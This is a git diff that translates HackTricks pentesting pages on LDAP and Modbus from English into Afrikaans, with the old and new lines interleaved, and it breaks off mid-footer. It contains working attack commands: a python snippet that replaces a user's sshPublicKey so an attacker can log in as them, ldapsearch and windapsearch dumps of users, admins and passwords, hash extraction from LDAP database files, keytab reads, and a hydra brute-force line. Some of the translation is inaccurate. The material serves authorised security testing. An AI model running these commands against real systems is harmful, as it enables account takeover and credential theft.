-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-The use of **LDAP** (Lightweight Directory Access Protocol) is mainly for locating various entities such as organizations, individuals, and resources like files and devices within networks, both public and private. It offers a streamlined approach compared to its predecessor, DAP, by having a smaller code footprint. +Die gebruik van **LDAP** (Lightweight Directory Access Protocol) is hoofsaaklik vir die opspoor van verskillende entiteite soos organisasies, individue, en hulpbronne soos lêers en toestelle binne netwerke, beide openbare en private. Dit bied 'n gestroomlynste benadering in vergelyking met sy voorganger, DAP, deur 'n kleiner kodevoetspoor te hê. -LDAP directories are structured to allow their distribution across several servers, with each server housing a **replicated** and **synchronized** version of the directory, referred to as a Directory System Agent (DSA). Responsibility for handling requests lies entirely with the LDAP server, which may communicate with other DSAs as needed to deliver a unified response to the requester. +LDAP-gidse is gestruktureer om hulle verspreiding oor verskeie bedieners moontlik te maak, met elke bediener wat 'n **gerepliseerde** en **gesinchroniseerde** weergawe van die gids huisves, wat verwys word as 'n Directory System Agent (DSA). Die verantwoordelikheid vir die hanteer van versoeke lê heeltemal by die LDAP-bediener, wat indien nodig met ander DSA's kan kommunikeer om 'n eenvormige antwoord aan die versoeker te lewer. -The LDAP directory's organization resembles a **tree hierarchy, starting with the root directory at the top**. This branches down to countries, which further divide into organizations, and then to organizational units representing various divisions or departments, finally reaching the individual entities level, including both people and shared resources like files and printers. - -**Default port:** 389 and 636(ldaps). Global Catalog (LDAP in ActiveDirectory) is available by default on ports 3268, and 3269 for LDAPS. +Die organisasie van die LDAP-gids lyk soos 'n **boomhiërargie, wat begin met die wortelgids bo-aan**. Dit vertak na lande, wat verder verdeel in organisasies, en dan na organisatoriese eenhede wat verskillende afdelings of departemente verteenwoordig, en uiteindelik die individuele entiteitevlak bereik, insluitend mense en gedeelde hulpbronne soos lêers en drukkers. +**Verstekpoort:** 389 en 636 (ldaps). Die Globale Katalogus (LDAP in ActiveDirectory) is verstek beskikbaar op poorte 3268 en 3269 vir LDAPS. ``` PORT STATE SERVICE REASON 389/tcp open ldap syn-ack 636/tcp open tcpwrapped ``` +### LDAP Data Interchange-formaat -### LDAP Data Interchange Format - -LDIF (LDAP Data Interchange Format) defines the directory content as a set of records. It can also represent update requests (Add, Modify, Delete, Rename). - +LDIF (LDAP Data Interchange Format) definieer die gidsinhoud as 'n stel rekords. Dit kan ook opdateringsversoeke (Voeg by, Wysig, Verwyder, Hernoem) voorstel. ```bash dn: dc=local dc: local @@ -60,16 +57,14 @@ ou: mail: pepe@hacktricks.xyz phone: 23627387495 ``` +* Lyne 1-3 definieer die topvlakdomein local +* Lyne 5-8 definieer die eerste vlakdomein moneycorp (moneycorp.local) +* Lyne 10-16 definieer 2 organisatoriese eenhede: dev en sales +* Lyne 18-26 skep 'n objek van die domein en ken eienskappe met waardes toe -* Lines 1-3 define the top level domain local -* Lines 5-8 define the first level domain moneycorp (moneycorp.local) -* Lines 10-16 define 2 organizational units: dev and sales -* Lines 18-26 create an object of the domain and assign attributes with values - -## Write data - -Note that if you can modify values you could be able to perform really interesting actions. For example, imagine that you **can change the "sshPublicKey" information** of your user or any user. It's highly probable that if this attribute exist, then **ssh is reading the public keys from LDAP**. If you can modify the public key of a user you **will be able to login as that user even if password authentication is not enabled in ssh**. +## Skryf data +Let daarop dat as jy waardes kan wysig, jy baie interessante aksies kan uitvoer. Byvoorbeeld, stel jou voor jy **kan die "sshPublicKey" inligting verander** van jou gebruiker of enige gebruiker. Dit is baie waarskynlik dat as hierdie eienskap bestaan, dan **lees ssh die openbare sleutels vanaf LDAP**. As jy die openbare sleutel van 'n gebruiker kan wysig, **sal jy in staat wees om as daardie gebruiker in te teken selfs as wagwoordverifikasie nie in ssh geaktiveer is nie**. ```bash # Example from https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/ >>> import ldap3 @@ -81,63 +76,55 @@ True u'dn:uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN' >>> connection.modify('uid=USER,ou=USERS,dc=DOMAINM=,dc=DOMAIN',{'sshPublicKey': [(ldap3.MODIFY_REPLACE, ['ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHRMu2et/B5bUyHkSANn2um9/qtmgUTEYmV9cyK1buvrS+K2gEKiZF5pQGjXrT71aNi5VxQS7f+s3uCPzwUzlI2rJWFncueM1AJYaC00senG61PoOjpqlz/EUYUfj6EUVkkfGB3AUL8z9zd2Nnv1kKDBsVz91o/P2GQGaBX9PwlSTiR8OGLHkp2Gqq468QiYZ5txrHf/l356r3dy/oNgZs7OWMTx2Rr5ARoeW5fwgleGPy6CqDN8qxIWntqiL1Oo4ulbts8OxIU9cVsqDsJzPMVPlRgDQesnpdt4cErnZ+Ut5ArMjYXR2igRHLK7atZH/qE717oXoiII3UIvFln2Ivvd8BRCvgpo+98PwN8wwxqV7AWo0hrE6dqRI7NC4yYRMvf7H8MuZQD5yPh2cZIEwhpk7NaHW0YAmR/WpRl4LbT+o884MpvFxIdkN1y1z+35haavzF/TnQ5N898RcKwll7mrvkbnGrknn+IT/v3US19fPJWzl1/pTqmAnkPThJW/k= badguy@evil'])]}) ``` +## Sniff duidelike wagwoorde -## Sniff clear text credentials +As LDAP sonder SSL gebruik word, kan jy **duidelike wagwoorde in die netwerk duidelik sien**. -If LDAP is used without SSL you can **sniff credentials in plain text** in the network. +Jy kan ook 'n **MITM**-aanval in die netwerk uitvoer **tussen die LDAP-bediener en die kliënt**. Hier kan jy 'n **Downgrade-aanval** uitvoer sodat die kliënt die **duidelike wagwoorde** gebruik om aan te meld. -Also, you can perform a **MITM** attack in the network **between the LDAP server and the client.** Here you can make a **Downgrade Attack** so the client with use the **credentials in clear text** to login. +**As SSL gebruik word**, kan jy probeer om 'n **MITM** uit te voer soos hierbo genoem, maar deur 'n **vals sertifikaat** aan te bied. As die **gebruiker dit aanvaar**, kan jy die verifikasiemetode afgradeer en die wagwoorde weer sien. -**If SSL is used** you can try to make **MITM** like the mentioned above but offering a **false certificate**, if the **user accepts it**, you are able to Downgrade the authentication method and see the credentials again. +## Anonieme Toegang -## Anonymous Access - -### Bypass TLS SNI check - -According to [**this writeup**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/) just by accessing the LDAP server with an arbitrary domain name (like company.com) he was able to contact the LDAP service and extract information as an anonymous user: +### Om TLS SNI-kontrole te omseil +Volgens [**hierdie verslag**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/) was dit net deur toegang tot die LDAP-bediener met 'n willekeurige domeinnaam (soos company.com) te verkry, moontlik om die LDAP-diens te kontak en inligting as 'n anonieme gebruiker te onttrek: ```bash ldapsearch -H ldaps://company.com:636/ -x -s base -b '' "(objectClass=*)" "*" + ``` +### LDAP anonieme bindmiddels -### LDAP anonymous binds +[LDAP anonieme bindmiddels](https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/anonymous-ldap-operations-active-directory-disabled) maak dit vir **ongeagtekteerde aanvallers** moontlik om inligting uit die domein te bekom, soos 'n volledige lys van gebruikers, groepe, rekenaars, gebruikersrekeningseienskappe en die domein wagwoordbeleid. Dit is 'n **ouditiewe konfigurasie**, en vanaf Windows Server 2003 word slegs geautehtiseerde gebruikers toegelaat om LDAP-versoeke te inisieer.\ +Nietemin kan administrateurs 'n spesifieke toepassing moes **opstel om anonieme bindmiddels toe te laat** en meer toegang as bedoel is, uitgereik het, waarmee ongeautehtiseerde gebruikers toegang tot alle voorwerpe in AD verkry. -[LDAP anonymous binds](https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/anonymous-ldap-operations-active-directory-disabled) allow **unauthenticated attackers** to retrieve information from the domain, such as a complete listing of users, groups, computers, user account attributes, and the domain password policy. This is a **legacy configuration**, and as of Windows Server 2003, only authenticated users are permitted to initiate LDAP requests.\ -However, admins may have needed to **set up a particular application to allow anonymous binds** and given out more than the intended amount of access, thereby giving unauthenticated users access to all objects in AD. +## Geldige Gelde -## Valid Credentials - -If you have valid credentials to login into the LDAP server, you can dump all the information about the Domain Admin using: +As jy geldige gelde het om in te teken op die LDAP-bediener, kan jy alle inligting oor die Domeinadministrateur aflaai deur gebruik te maak van: [ldapdomaindump](https://github.com/dirkjanm/ldapdomaindump) - ```bash -pip3 install ldapdomaindump +pip3 install ldapdomaindump ldapdomaindump [-r ] -u '\' -p '' [--authtype SIMPLE] --no-json --no-grep [-o /path/dir] ``` - ### [Brute Force](../generic-methodologies-and-resources/brute-force.md#ldap) -## Enumeration +## Opname -### Automated - -Using this you will be able to see the **public information** (like the domain name)**:** +### Outomaties +Deur hiervan gebruik te maak, sal jy in staat wees om die **openbare inligting** (soos die domeinnaam) te sien: ```bash nmap -n -sV --script "ldap* and not brute" #Using anonymous credentials ``` - ### Python
-See LDAP enumeration with python +Sien LDAP opsporing met python -You can try to **enumerate a LDAP with or without credentials using python**: `pip3 install ldap3` - -First try to **connect without** credentials: +Jy kan probeer om 'n LDAP te **opspoor met of sonder geloofsbriewe met behulp van python**: `pip3 install ldap3` +Eerste probeer om **sonder** geloofsbriewe te verbind: ```bash >>> import ldap3 >>> server = ldap3.Server('x.X.x.X', get_info = ldap3.ALL, port =636, use_ssl = True) @@ -146,39 +133,31 @@ First try to **connect without** credentials: True >>> server.info ``` - -If the response is `True` like in the previous example, you can obtain some **interesting data** of the LDAP (like the **naming context** or **domain name**) server from: - +As die antwoord `True` is, soos in die vorige voorbeeld, kan jy sekere **interessante data** van die LDAP (soos die **naamgewingskonteks** of **domeinnaam**) bediener verkry vanaf: ```bash >>> server.info DSA info (from DSE): Supported LDAP versions: 3 -Naming contexts: +Naming contexts: dc=DOMAIN,dc=DOMAIN ``` - -Once you have the naming context you can make some more exciting queries. This simply query should show you all the objects in the directory: - +Sodra jy die naamkonteks het, kan jy 'n paar opwindende navrae maak. Hierdie eenvoudige navraag behoort jou al die voorwerpe in die gids te wys: ```bash >>> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=*))', search_scope='SUBTREE', attributes='*') True >> connection.entries ``` - -Or **dump** the whole ldap: - +Of **dump** die hele ldap: ```bash >> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=person))', search_scope='SUBTREE', attributes='userPassword') True >>> connection.entries ``` -
### windapsearch -[**Windapsearch**](https://github.com/ropnop/windapsearch) is a Python script useful to **enumerate users, groups, and computers from a Windows** domain by utilizing LDAP queries. - +[**Windapsearch**](https://github.com/ropnop/windapsearch) is 'n Python-skrips wat nuttig is om gebruikers, groepe en rekenaars van 'n Windows-domein te tel deur gebruik te maak van LDAP-navrae. ```bash # Get computers python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --computers @@ -191,11 +170,9 @@ python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --d # Get Privileged Users python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --privileged-users ``` - ### ldapsearch -Check null credentials or if your credentials are valid: - +Kontroleer nul-gedagtes of as jou geloofsbriewe geldig is: ```bash ldapsearch -x -H ldap:// -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=" ldapsearch -x -H ldap:// -D '\' -w '' -b "DC=<1_SUBDOMAIN>,DC=" @@ -206,13 +183,11 @@ ldapsearch -x -H ldap:// -D '\' -w '' -b "DC=<1_ search: 2 result: 1 Operations error text: 000004DC: LdapErr: DSID-0C090A4C, comment: In order to perform this opera - tion a successful bind must be completed on the connection., data 0, v3839 +tion a successful bind must be completed on the connection., data 0, v3839 ``` +As jy iets vind wat sê dat die "_bind voltooi moet word_", beteken dit dat die geloofsbriewe nie korrek is nie. -If you find something saying that the "_bind must be completed_" means that the credentials are incorrect. - -You can extract **everything from a domain** using: - +Jy kan **alles van 'n domein** onttrek deur gebruik te maak van: ```bash ldapsearch -x -H ldap:// -D '\' -w '' -b "DC=<1_SUBDOMAIN>,DC=" -x Simple Authentication @@ -221,69 +196,49 @@ ldapsearch -x -H ldap:// -D '\' -w '' -b "DC=<1_ -w My password -b Base site, all data from here will be given ``` - -Extract **users**: - +Trek **gebruikers** uit: ```bash ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Users,DC=<1_SUBDOMAIN>,DC=" #Example: ldapsearch -x -H ldap:// -D 'MYDOM\john' -w 'johnpassw' -b "CN=Users,DC=mydom,DC=local" ``` - -Extract **computers**: - +Ekstraeer **rekenaars**: ```bash ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Computers,DC=<1_SUBDOMAIN>,DC=" ``` - -Extract **my info**: - +Ekstrakteer **my inligting**: ```bash ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=,CN=Users,DC=<1_SUBDOMAIN>,DC=" ``` - -Extract **Domain Admins**: - +Trek **Domain Admins** uit: ```bash ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Domain Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=" ``` - -Extract **Domain Users**: - +Onttrek **Domain-gebruikers**: ```bash ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Domain Users,CN=Users,DC=<1_SUBDOMAIN>,DC=" ``` - -Extract **Enterprise Admins**: - +Trek **Enterprise Admins** uit: ```bash ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Enterprise Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=" ``` - -Extract **Administrators**: - +Trek **Administrateurs** uit: ```bash ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Administrators,CN=Builtin,DC=<1_SUBDOMAIN>,DC=" ``` - -Extract **Remote Desktop Group**: - +Trek die **Remote Desktop Groep** uit: ```bash ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Remote Desktop Users,CN=Builtin,DC=<1_SUBDOMAIN>,DC=" ``` - -To see if you have access to any password you can use grep after executing one of the queries: - +Om te sien of jy toegang het tot enige wagwoord, kan jy grep gebruik nadat jy een van die navrae uitgevoer het: ```bash | grep -i -A2 -B2 "userpas" ``` - -Please, notice that the passwords that you can find here could not be the real ones... +Let asseblief daarop dat die wagwoorde wat jy hier kan vind, nie noodwendig die regte wagwoorde is nie... #### pbis -You can download **pbis** from here: [https://github.com/BeyondTrust/pbis-open/](https://github.com/BeyondTrust/pbis-open/) and it's usually installed in `/opt/pbis`.\ -**Pbis** allow you to get basic information easily: - +Jy kan **pbis** hier aflaai: [https://github.com/BeyondTrust/pbis-open/](https://github.com/BeyondTrust/pbis-open/) en dit word gewoonlik geïnstalleer in `/opt/pbis`.\ +**Pbis** maak dit maklik om basiese inligting te bekom: ```bash #Read keytab file ./klist -k /etc/krb5.keytab @@ -322,118 +277,113 @@ You can download **pbis** from here: [https://github.com/BeyondTrust/pbis-open/] #Get description of each user ./adtool -a search-user --name CN="*" --keytab=/etc/krb5.keytab -n | grep "CN" | while read line; do - echo "$line"; - ./adtool --keytab=/etc/krb5.keytab -n -a lookup-object --dn="$line" --attr "description"; - echo "======================" +echo "$line"; +./adtool --keytab=/etc/krb5.keytab -n -a lookup-object --dn="$line" --attr "description"; +echo "======================" done ``` - -## Graphical Interface +## Grafiese Gebruikerskoppelvlak ### Apache Directory -[**Download Apache Directory from here**](https://directory.apache.org/studio/download/download-linux.html). You can find an [example of how to use this tool here](https://www.youtube.com/watch?v=VofMBg2VLnw\&t=3840s). +[**Laai Apache Directory hier af**](https://directory.apache.org/studio/download/download-linux.html). Jy kan 'n [voorbeeld van hoe om hierdie instrument te gebruik hier vind](https://www.youtube.com/watch?v=VofMBg2VLnw\&t=3840s). ### jxplorer -You can download a graphical interface with LDAP server here: [http://www.jxplorer.org/downloads/users.html](http://www.jxplorer.org/downloads/users.html) +Jy kan 'n grafiese koppelvlak met LDAP-bediener hier aflaai: [http://www.jxplorer.org/downloads/users.html](http://www.jxplorer.org/downloads/users.html) -By default is is installed in: _/opt/jxplorer_ +Standaard word dit geïnstalleer in: _/opt/jxplorer_ ![](<../.gitbook/assets/image (22) (1).png>) ### Godap -You can access it in [https://github.com/Macmod/godap](https://github.com/Macmod/godap) +Jy kan dit toegang in [https://github.com/Macmod/godap](https://github.com/Macmod/godap) -## Authentication via kerberos +## Verifikasie via kerberos -Using `ldapsearch` you can **authenticate** against **kerberos instead** of via **NTLM** by using the parameter `-Y GSSAPI` +Met behulp van `ldapsearch` kan jy **verifieer** teen **kerberos in plaas daarvan** van via **NTLM** deur die parameter `-Y GSSAPI` te gebruik. ## POST -If you can access the files where the databases are contained (could be in _/var/lib/ldap_). You can extract the hashes using: - +As jy toegang het tot die lêers waar die databasisse bevat word (kan in _/var/lib/ldap_ wees), kan jy die hakse uittrek deur die volgende te gebruik: ```bash cat /var/lib/ldap/*.bdb | grep -i -a -E -o "description.*" | sort | uniq -u ``` +Jy kan John voer met die wagwoordhash (van '{SSHA}' tot 'struktureel' sonder om 'struktureel' by te voeg). -You can feed john with the password hash (from '{SSHA}' to 'structural' without adding 'structural'). +### Konfigurasie Lêers -### Configuration Files - -* General - * containers.ldif - * ldap.cfg - * ldap.conf - * ldap.xml - * ldap-config.xml - * ldap-realm.xml - * slapd.conf -* IBM SecureWay V3 server - * V3.sas.oc -* Microsoft Active Directory server - * msadClassesAttrs.ldif +* Algemeen +* containers.ldif +* ldap.cfg +* ldap.conf +* ldap.xml +* ldap-config.xml +* ldap-realm.xml +* slapd.conf +* IBM SecureWay V3-bediener +* V3.sas.oc +* Microsoft Active Directory-bediener +* msadClassesAttrs.ldif * Netscape Directory Server 4 - * nsslapd.sas\_at.conf - * nsslapd.sas\_oc.conf -* OpenLDAP directory server - * slapd.sas\_at.conf - * slapd.sas\_oc.conf +* nsslapd.sas\_at.conf +* nsslapd.sas\_oc.conf +* OpenLDAP-directory-bediener +* slapd.sas\_at.conf +* slapd.sas\_oc.conf * Sun ONE Directory Server 5.1 - * 75sas.ldif - -## HackTricks Automatic Commands +* 75sas.ldif +## HackTricks Outomatiese Opdragte ``` Protocol_Name: LDAP #Protocol Abbreviation if there is one. Port_Number: 389,636 #Comma separated if there is more than one. Protocol_Description: Lightweight Directory Access Protocol #Protocol Abbreviation Spelled out Entry_1: - Name: Notes - Description: Notes for LDAP - Note: | - The use of LDAP (Lightweight Directory Access Protocol) is mainly for locating various entities such as organizations, individuals, and resources like files and devices within networks, both public and private. It offers a streamlined approach compared to its predecessor, DAP, by having a smaller code footprint. +Name: Notes +Description: Notes for LDAP +Note: | +The use of LDAP (Lightweight Directory Access Protocol) is mainly for locating various entities such as organizations, individuals, and resources like files and devices within networks, both public and private. It offers a streamlined approach compared to its predecessor, DAP, by having a smaller code footprint. - https://book.hacktricks.xyz/pentesting/pentesting-ldap +https://book.hacktricks.xyz/pentesting/pentesting-ldap Entry_2: - Name: Banner Grab - Description: Grab LDAP Banner - Command: nmap -p 389 --script ldap-search -Pn {IP} +Name: Banner Grab +Description: Grab LDAP Banner +Command: nmap -p 389 --script ldap-search -Pn {IP} Entry_3: - Name: LdapSearch - Description: Base LdapSearch - Command: ldapsearch -H ldap://{IP} -x +Name: LdapSearch +Description: Base LdapSearch +Command: ldapsearch -H ldap://{IP} -x Entry_4: - Name: LdapSearch Naming Context Dump - Description: Attempt to get LDAP Naming Context - Command: ldapsearch -H ldap://{IP} -x -s base namingcontexts +Name: LdapSearch Naming Context Dump +Description: Attempt to get LDAP Naming Context +Command: ldapsearch -H ldap://{IP} -x -s base namingcontexts Entry_5: - Name: LdapSearch Big Dump - Description: Need Naming Context to do big dump - Command: ldapsearch -H ldap://{IP} -x -b "{Naming_Context}" +Name: LdapSearch Big Dump +Description: Need Naming Context to do big dump +Command: ldapsearch -H ldap://{IP} -x -b "{Naming_Context}" Entry_6: - Name: Hydra Brute Force - Description: Need User - Command: hydra -l {Username} -P {Big_Passwordlist} {IP} ldap2 -V -f +Name: Hydra Brute Force +Description: Need User +Command: hydra -l {Username} -P {Big_Passwordlist} {IP} ldap2 -V -f ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
diff --git a/network-services-pentesting/pentesting-modbus.md b/network-services-pentesting/pentesting-modbus.md index 4350f1e8c..d012c3419 100644 --- a/network-services-pentesting/pentesting-modbus.md +++ b/network-services-pentesting/pentesting-modbus.md @@ -1,52 +1,83 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-# Basic Information +# Basiese Inligting -In 1979, the **Modbus Protocol** was developed by Modicon, serving as a messaging structure. Its primary use involves facilitating communication between intelligent devices, operating under a master-slave/client-server model. This protocol plays a crucial role in enabling devices to exchange data efficiently. - -**Default port:** 502 +In 1979 is die **Modbus-protokol** ontwikkel deur Modicon en dien as 'n boodskapstruktuur. Dit word hoofsaaklik gebruik om kommunikasie tussen intelligente toestelle te fasiliteer, wat werk volgens 'n meester-slaaf/kliënt-bedienermodel. Hierdie protokol speel 'n belangrike rol in die effektiewe uitruil van data tussen toestelle. +**Verstekpoort:** 502 ``` PORT STATE SERVICE 502/tcp open modbus ``` +# Opname -# Enumeration +## Modbus +Modbus is 'n kommunikasieprotokol wat gebruik word vir die kommunikasie tussen industriële beheerstelsels en toestelle. Dit is 'n oop protokol en word dikwels gebruik in industriële omgewings soos fabrieke en kragstasies. + +### Modbus TCP + +Modbus TCP is 'n uitbreiding van die Modbus-protokol wat gebruik maak van TCP/IP-verbindinge. Dit maak gebruik van die TCP-poort 502 vir kommunikasie. + +Om Modbus TCP te ondersoek, kan jy die volgende stappe volg: + +1. Identifiseer die IP-adres van die Modbus TCP-bedieners. +2. Skandeer die TCP-poort 502 om aktiewe Modbus TCP-bedieners te vind. +3. Identifiseer die Modbus-eenheid-ID's wat deur die bedieners gebruik word. +4. Voer 'n Modbus-leesoperasie uit om data van die bedieners te onttrek. +5. Analiseer die verkrygde data om inligting oor die bedieners en hul funksies te verkry. + +### Modbus RTU + +Modbus RTU is 'n ander uitbreiding van die Modbus-protokol wat gebruik maak van seriële kommunikasie. Dit maak gebruik van RS-232 of RS-485-verbindinge. + +Om Modbus RTU te ondersoek, kan jy die volgende stappe volg: + +1. Identifiseer die seriële poorte wat gebruik word vir Modbus RTU-kommunikasie. +2. Skandeer die poorte om aktiewe Modbus RTU-toestelle te vind. +3. Identifiseer die Modbus-eenheid-ID's wat deur die toestelle gebruik word. +4. Voer 'n Modbus-leesoperasie uit om data van die toestelle te onttrek. +5. Analiseer die verkrygde data om inligting oor die toestelle en hul funksies te verkry. + +### Modbus ASCII + +Modbus ASCII is 'n ander uitbreiding van die Modbus-protokol wat gebruik maak van ASCII-karakters vir kommunikasie. Dit maak gebruik van RS-232-verbindinge. + +Om Modbus ASCII te ondersoek, kan jy die volgende stappe volg: + +1. Identifiseer die seriële poorte wat gebruik word vir Modbus ASCII-kommunikasie. +2. Skandeer die poorte om aktiewe Modbus ASCII-toestelle te vind. +3. Identifiseer die Modbus-eenheid-ID's wat deur die toestelle gebruik word. +4. Voer 'n Modbus-leesoperasie uit om data van die toestelle te onttrek. +5. Analiseer die verkrygde data om inligting oor die toestelle en hul funksies te verkry. ```bash nmap --script modbus-discover -p 502 msf> use auxiliary/scanner/scada/modbusdetect msf> use auxiliary/scanner/scada/modbus_findunitid ``` - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 